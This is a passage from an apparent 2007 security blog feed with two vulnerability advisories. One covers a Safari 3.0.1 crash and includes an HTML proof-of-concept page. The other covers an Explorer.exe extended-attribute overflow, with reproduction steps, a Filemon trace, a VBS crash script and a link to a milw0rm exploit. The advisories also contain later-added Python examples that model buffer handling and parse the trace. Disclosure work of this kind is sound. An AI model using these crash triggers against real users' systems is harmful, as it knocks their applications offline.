La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-23912686167395433222007-06-16T08:45:00.000-07:002007-06-27T10:42:03.129-07:00Safari 3.0.1 (552.12.2) for windows corefoundation.dll DoS############################################<br />Safari 3.0.1 (552.12.2) for Windows corefoundation.dll DoS<br />Vendor Url: www.apple.com/safari/<br />Advisory: http://lostmon.blogspot.com/2007/06/safari-301-552122-for-windows.html<br />Vendor notified: yes  Exploit available: yes<br />BID: <a href="http://www.securityfocus.com/bid/24497" target="_BLANK">24497</a><br />###########################################<br /><br />Safari contains a flaw that may allow a remote denial of service.<br />The issue is triggered when specially crafted input is processed<br />by the web browser. The crashes occur due to issues with the<br />functions that manage the History and All History, and result<br />in loss of availability for the application. I don't know if this<br />can execute arbitrary code.<br /><br /><br /><br />#############<br />Versions:<br />#############<br /><br />Safari 3.0.1<br /><br />###########<br />Solution:<br />###########<br /><br />Update to version 3.0.2<br /><br />##########<br />Timeline:<br />##########<br /><br /> Discovered: 14-06-2007<br /> Vendor notified: 15-06-2007<br /> Vendor response:<br /> Disclosure: 16-06-2007<br /><br />#####################<br />Details of the crash<br />#####################<br /><br />See the screenshot:<br /><br />http://www.spymac.com/upload/2007/06/15/iBvYpCnJFW.gif<br /><br />--<br /><br />Crash !<br /><br />AppName: safari.exe AppVer: 3.522.12.2 ModName: corefoundation.dll<br />ModVer: 1.434.6.0 Offset: 000097cd<br /><br />#################<br />Safari Crash PoC<br />#################<br />Save this file as an HTML document and open it in Safari;<br />put some number in the second form and Safari crashes.<br /><br /><html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title><br /><body><br /><p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p><br /><p> Put some number in the second form for crash Safari</p><br /><form id="historyForm1" method="GET" action="#"><br /><input type="text" id="currentIndex1" name="currentIndex" value="sss"><br /><textarea id="historyLocation1" name="historyLocation"></textarea><br /><form id="historyForm2" method="GET" action="#"><br /><input type="text" id="currentIndex2" name="currentIndex"><br /><textarea id="historyLocation2" name="historyLocation"></textarea><br /></form></form></body></html><br /><br />#################### €nd #####################<br /><br />Thnx to estrella for being my light<br />Thnx to all Lostmon's Groups<br />Thnx to all who believe in me !!<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-82508404451207588812007-06-04T11:37:00.003-07:002010-04-18T08:16:53.629-07:00Buffer overflow in extended file attributes in Explorer.exe#######################################################<br />
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)<br />
Buffer overflow in extended file attributes.<br />
Vendor url: http://www.microsoft.com/<br />
Advisory: http://lostmon.blogspot.com/2007/06/buffer-overflow-in-extended-file.html<br />
Vendor notified: yes  Vendor confirmed: yes  Exploit included: NO<br />
#######################################################<br />
<br />
################<br />
SUMMARY:<br />
################<br />
<br />
1 - History (how and why)<br />
2 - Explanation of the buffer overflow<br />
3 - Versions tested<br />
4 - Solution<br />
5 - Timeline<br />
6 - Response from vendor<br />
7 - Test<br />
8 - Related vulns and documentation<br />
<br />
<br />
<br />
####################<br />
1 - History:<br />
####################<br />
<br />
<br />
If we look at this M$ advisory, the information in the following section:<br />
<br />
http://www.microsoft.com/technet/security/advisory/933052.mspx<br />
<br />
--<br />
Mitigating Factors for Microsoft Word Remote Code Execution Vulnerability:<br />
<br />
The vulnerability cannot be exploited automatically through e-mail.<br />
For an attack to be successful, a user must open an attachment that<br />
is sent in an e-mail message.<br />
--<br />
<br />
This is not entirely true :)<br />
<br />
If the user downloads the file and puts it in a folder, Explorer<br />
crashes when the folder is opened...<br />
<br />
If you open any program that uses the Windows API and ole32.dll to<br />
open files, go to File/Open and browse to the folder containing the<br />
malformed .doc file, Explorer calls ole32.dll and the program<br />
crashes, losing all unsaved information.<br />
<br />
Examples of this case:<br />
<br />
Notepad++ => http://notepad-plus.sourceforge.net/es/site.htm<br />
(vendor notified on 27-05-2007 via e-mail, no response)<br />
<br />
Multiple programs of the Macromedia family => http://www.macromedia.com<br />
(Adobe informed on 27-05-2007 via web form and confirmed:<br />
http://www.adobe.com/misc/securityform.html)<br />
<br />
Multiple other programs are affected.<br />
<br />
After a quick study of the malformed Word document exploit/vulns<br />
I have a small observation: I think this vuln could be triggered<br />
in some other programs, not only in a Word app.<br />
<br />
After monitoring Explorer and some DLLs I think this is only<br />
the tip of the iceberg. The overflow happens when Explorer<br />
calls the kernel module KERNEL32, which makes system calls through<br />
ntdll.dll to manage the information of a file.<br />
<br />
Specifically, in the functions GetFileAttributesExW and GetFileAttributesW<br />
(KERNEL32) and in the undocumented functions NtQueryInformationFile,<br />
NtQueryDirectoryFile and NtSetInformationFile in ntdll.dll.<br />
<br />
Those functions obtain the extended file attributes; if the information<br />
is too long, in the sub-functions FileAllInformation(), FileNameInformation()<br />
and others (see FILE_INFORMATION_CLASS) we obtain a buffer overflow,<br />
and some other sub-functions can hit the same error.<br />
<br />
Windows shows the extended file attributes in multiple parts of the system,<br />
when viewing a folder, or when hovering the mouse over a file or a folder.<br />
<br />
Other applications use the same files to do the same :)<br />
<br />
#######################<br />
2 - Explanation<br />
#######################<br />
<br />
<p>Extended file attributes are a file system feature that enables users to<br />
associate computer files with metadata not interpreted by the filesystem,<br />
whereas regular attributes have a purpose strictly defined by the filesystem<br />
(such as permissions or records of creation and modification times). Unlike<br />
forks, which can usually be as large as the maximum file size, extended<br />
attributes are usually limited in size to a value significantly smaller than<br />
the maximum file size. Typical uses can be storing the author of a document,<br />
the character encoding of a plain-text document, or a checksum.</p><br />
<br />
<br />
A local buffer overflow exists in Windows Explorer.<br />
The extended file attribute functions use a small buffer for 'FileAllInformation(), FileNameInformation' and other information classes in<br />
undocumented functions of NTDLL, resulting in a buffer overflow with<br />
an unknown impact.<br />
<br />
<br />
<br />
These are the buffer sizes for the related information classes<br />
and the main function involved:<br />
<br />
FileAllInformation<br />
// 18 FILE_ALL_INFORMATION 0x68 NtQueryInformationFile <br />
<br />
FileNameInformation<br />
// 9 FILE_NAME_INFORMATION 0x08 NtQueryInformationFile <br />
<br />
Other information classes can be vulnerable too;<br />
see this table:<br />
<br />
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/File/FILE_INFORMATION_CLASS.html<br />
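The 0x08 and 0x68 in the table above are the fixed parts of FILE_NAME_INFORMATION and FILE_ALL_INFORMATION; the file name that follows them is variable-length, and when the caller's buffer cannot hold it NtQueryInformationFile returns the NTSTATUS warning STATUS_BUFFER_OVERFLOW (0x80000005), the status Filemon prints as "BUFFER OVERFLOW". The Python below is an added example, not part of the original advisory and not a call into ntdll: it models that contract for FileNameInformation and shows the check a client of these functions should make, namely re-allocating from the FileNameLength that even a truncated answer reports. The function names (query_file_name_information, read_file_name) and the sample file names are assumptions/constructed.<br />

```python
import struct

# NTSTATUS values (Windows constants).
STATUS_SUCCESS = 0x00000000
STATUS_BUFFER_OVERFLOW = 0x80000005       # warning: output truncated, caller's buffer too small
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004  # error: buffer smaller than the fixed header

# sizeof(FILE_NAME_INFORMATION): ULONG FileNameLength + WCHAR FileName[1], padded to 8.
# This is the 0x08 in the table; the name itself follows and is variable-length.
FILE_NAME_INFORMATION_HEADER = 8


def query_file_name_information(name, buffer_length):
    """Constructed model of NtQueryInformationFile(..., FileNameInformation).

    Fills a caller buffer of `buffer_length` bytes and returns (NTSTATUS, bytes).
    FileNameLength always carries the full length, and as many whole WCHARs of
    the name as fit are copied; if the name was cut short the status is the
    warning STATUS_BUFFER_OVERFLOW.  A model of the documented contract only,
    not a call into ntdll.
    """
    encoded = name.encode("utf-16-le")
    if buffer_length < FILE_NAME_INFORMATION_HEADER:
        return STATUS_INFO_LENGTH_MISMATCH, b""
    room = buffer_length - 4                  # bytes left after FileNameLength
    copied = encoded[: room - (room % 2)]     # whole WCHARs only
    status = STATUS_SUCCESS if len(copied) == len(encoded) else STATUS_BUFFER_OVERFLOW
    return status, struct.pack("<I", len(encoded)) + copied


def read_file_name(name, initial_length=FILE_NAME_INFORMATION_HEADER):
    """Correct client (assumed helper): start with the fixed size and, on
    STATUS_BUFFER_OVERFLOW, re-allocate using the reported FileNameLength.
    Returns (file_name, number_of_calls)."""
    length = initial_length
    calls = 0
    while True:
        calls += 1
        status, buf = query_file_name_information(name, length)
        name_len = struct.unpack_from("<I", buf, 0)[0] if len(buf) >= 4 else 0
        if status == STATUS_SUCCESS:
            return buf[4:4 + name_len].decode("utf-16-le"), calls
        if status == STATUS_BUFFER_OVERFLOW:
            # A truncated answer still tells us exactly how much we need.
            length = 4 + name_len
            continue
        raise OSError(f"NTSTATUS 0x{status:08X}")


if __name__ == "__main__":
    # Constructed sample name: first call with the 8-byte header is truncated,
    # the second call with the reported length succeeds.
    print(read_file_name("\\test\\explorer.txt"))
```

A caller that treats the first, truncated answer as complete (or that ignores the warning status entirely) is the kind of client bug this contract invites; the loop above is the check to look for when reviewing code that consumes these information classes.<br />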
<br />
<br />
When we hover over a file, explorer.exe reads the extended<br />
file attributes and shows this information in a 'bubble'; when<br />
we open a folder, explorer obtains the directory listing, file<br />
names and other information about the files.<br />
<br />
How to locate the overflow?<br />
<br />
1-create a new txt file, for example explorer.txt<br />
2-right-click on the file and open Properties<br />
3-in all of the boxes (Author, Title, Subject and especially<br />
in the Comments text area) write multiple A's, for example this many or more:<br />
<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
<br />
<br />
4-use Filemon http://www.microsoft.com/technet/sysinternals/FileAndDisk/Filemon.mspx<br />
<br />
and include the process explorer.exe<br />
<br />
5-click on the txt properties and click Accept or Apply.<br />
<br />
6-go to Filemon and look at the log for explorer.exe; you will have something<br />
similar to this:<br />
<br />
<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE<br />
NOT FOUND Options: Open Access: All<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA SUCCESS<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE<br />
NOT FOUND Options: Open Access: All<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Options:<br />
Create Access: All<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER<br />
OVERFLOW FileFsAttributeInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Position:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FilePositionInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER<br />
OVERFLOW FileAllInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA FILE<br />
NOT FOUND Options: Open Access: All<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER<br />
OVERFLOW FileAllInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Options:<br />
OverwriteIf Access: All<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA BUFFER<br />
OVERFLOW FileFsAttributeInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:<br />
88<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:<br />
88<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:<br />
88<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER<br />
OVERFLOW FileAllInformation<br />
21:24:00.046 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:<br />
30996<br />
21:24:00.046 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation<br />
<br />
The overflow is triggered :)<br />
<br />
Afterwards, when you hover over the file, Explorer shows the extended file attributes,<br />
and sometimes Filemon marks the overflow again.<br />
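To triage a Filemon trace like the one above without reading it by eye, here is an added Python example (not part of the original advisory) that splits each record into time, process, PID, IRP, path, result and detail, counts which information classes came back with BUFFER OVERFLOW, and lists the alternate data streams of the file that were touched. The records embedded in it are constructed from the trace above, one per line as Filemon writes them (the e-mail wrapped them); parse_line, buffer_overflow_summary and streams_touched are assumed helper names.<br />

```python
import re
from collections import Counter

# Constructed sample: records modelled on the advisory's Filemon trace,
# one record per line as Filemon writes it.
SAMPLE_LOG = r"""
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Position: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.046 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileAllInformation
"""

# The result column is a fixed vocabulary of NTSTATUS names, so the path
# (which contains spaces) can be matched lazily up to the first of them.
RESULTS = ("SUCCESS", "BUFFER OVERFLOW", "FILE NOT FOUND",
           "NAME NOT FOUND", "ACCESS DENIED")
LINE_RE = re.compile(
    r"^(?P<time>\d\d:\d\d:\d\d\.\d{3})\s+"
    r"(?P<process>\S+?):(?P<pid>\d+)\s+"
    r"(?P<irp>IRP_MJ_[A-Z_]+)\s+"
    r"(?P<path>.+?)\s+"
    r"(?P<result>" + "|".join(re.escape(r) for r in RESULTS) + r")"
    r"(?:\s+(?P<detail>.*))?$"
)


def parse_line(line):
    """One Filemon record as a dict, or None if the line is not a record."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    rec["detail"] = rec["detail"] or ""
    return rec


def parse_log(text):
    return [rec for rec in (parse_line(l) for l in text.splitlines()) if rec]


def stream_name(path):
    """Alternate data stream name from an NTFS path ending in ':<stream>:$DATA'."""
    last = path.rsplit("\\", 1)[-1]
    if last.endswith(":$DATA"):
        last = last[:-len(":$DATA")]
    return last.lstrip(":").strip()


def buffer_overflow_summary(records):
    """Count BUFFER OVERFLOW results per (IRP, information class)."""
    counts = Counter((r["irp"], r["detail"])
                     for r in records if r["result"] == "BUFFER OVERFLOW")
    return dict(counts)


def streams_touched(records):
    """Sorted set of the streams Explorer opened on the file."""
    return sorted({stream_name(r["path"]) for r in records})


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for (irp, info_class), n in buffer_overflow_summary(recs).items():
        print(f"{n}x BUFFER OVERFLOW on {irp} / {info_class}")
    print("streams:", streams_touched(recs))
```

Run as a script it prints the summary; on the sample it reports FileFsAttributeInformation once and FileAllInformation twice, the two information classes the trace above flags, plus the three SummaryInformation streams Explorer worked on.<br />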
<br />
<br />
###################<br />
3-versions tested<br />
###################<br />
<br />
I only tested with:<br />
<br />
Microsoft Windows XP Home Edition, all fixes as of 17/05/2007<br />
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)<br />
<br />
###################<br />
4-Solution<br />
###################<br />
<br />
Wait for an update or patch.<br />
<br />
####################<br />
5-Timeline:<br />
####################<br />
<br />
Discovered:12-03-2007<br />
Vendor notify:19-03-2007<br />
Vendor response:22-03-2007<br />
Private disclosure:17-05-2007<br />
Public disclosure:04-06-2007<br />
<br />
######################<br />
6-Response from vendor<br />
######################<br />
<br />
Thank you for checking up on this case. We have concluded<br />
our investigations on this matter and have found this crash<br />
to be un-exploitable. This vulnerability is very similar to<br />
another milw0rm posting (http://www.milw0rm.com/exploits/3419).<br />
As we have not been able to find an exploitable angle for<br />
this issue, this crash will get tracking into the next available<br />
Service Pack fix.<br />
<br />
#####################<br />
7- Test<br />
#####################<br />
<br />
1 download this exploit:<br />
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar<br />
and uncompress it in c:\test, or edit EFA_test.vbs with the correct<br />
path to where you put the malformed doc file.<br />
<br />
2 copy EFA_test.vbs and edit the correct path to the file.<br />
<br />
3 execute EFA_test.vbs<br />
<br />
The script looks up the extended file attributes<br />
of the malformed doc file, and when it tries to read<br />
the "Author" attribute Windows Script Host<br />
crashes.<br />
<br />
Other overflows could be triggered from any box of<br />
the file properties.<br />
The application that crashes is whichever one we use to<br />
look at the malformed doc file, here a VBS script;<br />
any other application that tries to look at the malformed<br />
doc file crashes too.<br />
<br />
This is a simple test using an existing exploit for<br />
Microsoft ole32.dll, but the overflow is deeper: it is in<br />
ntdll.dll, because ntdll.dll is the library that implements<br />
NtQueryInformationFile, used to obtain the extended file attributes.<br />
<br />
That is why this overflow can be triggered with any file type<br />
that carries malformed extended file attributes.<br />
<br />
<br />
<br />
########################################<br />
8-related vulns and documentations<br />
########################################<br />
<br />
########################<br />
EFA_test.vbs<br />
########################<br />
<br />
' EFA_test.vbs: print every details column (including the extended<br />
' file attributes) of each file in C:\test; edit the path as needed.<br />
Dim arrHeaders(35)<br />
Set objShell = CreateObject("Shell.Application")<br />
Set objFolder = objShell.Namespace("C:\test")<br />
' Column headers (Name, Size, Type, ..., Author, Title, Subject, Comments, ...)<br />
For i = 0 to 34<br />
    arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)<br />
Next<br />
' Read every column of every file; reading the malformed attributes is<br />
' what makes Windows Script Host crash.<br />
For Each strFileName in objFolder.Items<br />
    For i = 0 to 34<br />
        Wscript.Echo i & vbtab & arrHeaders(i) _<br />
            & ": " & objFolder.GetDetailsOf(strFileName, i)<br />
    Next<br />
Next<br />
<br />
<br />
<br />
###################<br />
RELATED VULNS :<br />
###################<br />
<br />
http://secunia.com/advisories/10020/<br />
<br />
http://secunia.com/advisories/10194/<br />
<br />
http://osvdb.org/displayvuln.php?osvdb_id=31885<br />
<br />
http://osvdb.org/displayvuln.php?osvdb_id=31886<br />
<br />
http://osvdb.org/displayvuln.php?osvdb_id=31887<br />
<br />
###################<br />
Related Exploit<br />
###################<br />
<br />
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar<br />
<br />
#################<br />
Related Microsoft<br />
security bulletin<br />
#################<br />
<br />
http://www.microsoft.com/technet/security/advisory/933052.mspx<br />
<br />
##################<br />
Related functions<br />
##################<br />
<br />
extended file attributes<br />
http://en.wikipedia.org/wiki/Extended_file_attributes<br />
<br />
GetExtFileProperties() <br />
http://www.kixtart.org/forums/ubbthreads.php?ubb=showflat&Number=160880&page=1<br />
<br />
File information class:<br />
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/<br />
NT%20Objects/File/FILE_INFORMATION_CLASS.html<br />
<br />
possible source code of ntdll<br />
